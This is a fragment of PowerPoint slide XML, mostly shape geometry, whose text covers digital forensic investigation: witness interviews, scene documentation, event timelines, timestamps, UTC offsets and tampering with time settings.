                  <a:pt x="5411572" y="3768891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5366501" y="3777254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5320368" y="3782362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5273294" y="3784092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630681" y="3784092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583607" y="3782362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537474" y="3777254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492403" y="3768891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448516" y="3757393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405935" y="3742882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364782" y="3725482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325180" y="3705312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287249" y="3682496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251111" y="3657155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216890" y="3629411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184705" y="3599386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154680" y="3567201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126936" y="3532980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101595" y="3496842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78779" y="3458911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58609" y="3419309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41209" y="3378156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26698" y="3335575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15200" y="3291688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6837" y="3246617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1729" y="3200484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3153410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="630682"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="427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949308" y="4517263"/>
            <a:ext cx="3900170" cy="237363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355600" marR="19050" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="8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dirty="0" sz="22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conducted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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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informal </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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statements.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264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dirty="0" sz="2200" spc="-10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avoids</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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leading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questions.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="36830" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="262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carried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through</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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formal </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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questioning.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624059" y="3156204"/>
            <a:ext cx="4238625" cy="875030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4238625" h="875029">
                <a:moveTo>
                  <a:pt x="4092448" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="145796" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99714" y="7433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59692" y="28131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28131" y="59692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7433" y="99714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="145796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="728980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7433" y="775061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28131" y="815083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59692" y="846644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99714" y="867342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145796" y="874776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4092448" y="874776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4138529" y="867342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4178551" y="846644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4210112" y="815083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4230810" y="775061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238244" y="728980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238244" y="145796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4230810" y="99714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4210112" y="59692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4178551" y="28131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4138529" y="7433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4092448" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4279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0515727" y="3401060"/>
            <a:ext cx="24580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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Witness</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Interviews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75841" y="1930145"/>
            <a:ext cx="1266063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Forensic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examination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involves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documenting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scene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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>done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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>using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following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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>tools: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60081" y="306451"/>
            <a:ext cx="173418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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Timelines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5431" y="760476"/>
            <a:ext cx="2555748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33625" y="1930145"/>
            <a:ext cx="1154493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visual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representation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events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happening</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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chronological</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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order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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>called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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>timeline.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74891" y="3197504"/>
            <a:ext cx="6228080" cy="285432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dirty="0" sz="2200" spc="55" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Time</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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145" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>stamps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37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185">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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-55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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100">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>methods</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>recording</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>time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37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25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Correct</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>synchronization</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>time</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>source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3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2200" spc="55" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Time</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-110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65" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>offset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37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60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Coordinated</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Universal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Time</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(UTC)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37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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Local</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>time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74891" y="6896760"/>
            <a:ext cx="6537325" cy="79057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dirty="0" sz="2200" spc="114" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Date</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-105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80" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95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90" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>time</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-90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90" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>settings</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95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105" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>tampering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37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60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Malfunction</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>audit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>system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241035" y="3067811"/>
            <a:ext cx="1275715" cy="1655445"/>
            <a:chOff x="5241035" y="3067811"/>
            <a:chExt cx="1275715" cy="1655445"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5241035" y="3067811"/>
              <a:ext cx="775970" cy="1655445"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="775970" h="1655445">
                  <a:moveTo>
                    <a:pt x="775715" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="728610" y="1515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682230" y="6001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636659" y="13372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591980" y="23538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548274" y="36412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505625" y="51905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464114" y="69931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423824" y="90401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384838" y="113227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347238" y="138321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311106" y="165596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276525" y="194963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243578" y="226334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212346" y="259622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182913" y="294739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155361" y="331596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129771" y="370106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106228" y="410181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84813" y="451733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65608" y="494674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48696" y="538916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34160" y="584372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22082" y="630952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12545" y="678570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5630" y="727138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421" y="776567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="826770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421" y="877135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5630" y="926715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12545" y="975422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22082" y="1023169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34160" y="1069867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48696" y="1115430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65608" y="1159769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84813" y="1202799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106228" y="1244430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129771" y="1284576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155361" y="1323150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182913" y="1360063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212346" y="1395228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243578" y="1428559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276525" y="1459966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311106" y="1489364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347238" y="1516664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384838" y="1541780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423824" y="1564622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464114" y="1585105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505625" y="1603141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548274" y="1618642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591980" y="1631520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636659" y="1641689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682230" y="1649061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728610" y="1653548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775715" y="1655064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775715" y="1336166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730067" y="1333824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685593" y="1326943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642501" y="1315740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600995" y="1300432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561281" y="1281236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523564" y="1258371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="488049" y="1232053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454942" y="1202499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424449" y="1169927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396773" y="1134554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372122" y="1096597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350699" y="1056274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332711" y="1013802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318363" y="969398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307860" y="923280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301408" y="875665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299212" y="826770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301408" y="777870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307860" y="730282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318363" y="684221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332711" y="639898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350699" y="597527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372122" y="557321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396773" y="519493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424449" y="484257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454942" y="451825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="488049" y="422410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523564" y="396226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561281" y="373485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600995" y="354402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642501" y="339188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685593" y="328057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730067" y="321222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775715" y="318897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775715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519927" y="3364991"/>
              <a:ext cx="996950" cy="1061085"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="996950" h="1061085">
                  <a:moveTo>
                    <a:pt x="498348" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="452991" y="2167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408774" y="8546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365874" y="18947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324466" y="33185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284727" y="51071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246831" y="72418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210956" y="97039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177277" y="124746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145970" y="155352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117212" y="188670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91177" y="224513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68043" y="262692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47985" y="303021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31180" y="345312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17802" y="389378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8029" y="435031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2036" y="482085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="530352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2036" y="578618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8029" y="625672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17802" y="671325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31180" y="715391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47985" y="757682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68043" y="798011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91177" y="836190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117212" y="872033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145970" y="905351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177277" y="935957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210956" y="963664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246831" y="988285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284727" y="1009632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324466" y="1027518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365874" y="1041756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408774" y="1052157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452991" y="1058536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498348" y="1060704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543704" y="1058536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587921" y="1052157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630821" y="1041756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672229" y="1027518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711968" y="1009632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749864" y="988285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785739" y="963664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819418" y="935957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850725" y="905351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879483" y="872033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905518" y="836190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="928652" y="798011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948710" y="757682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965515" y="715391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978893" y="671325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988666" y="625672"/>
                  </a:lnTo>
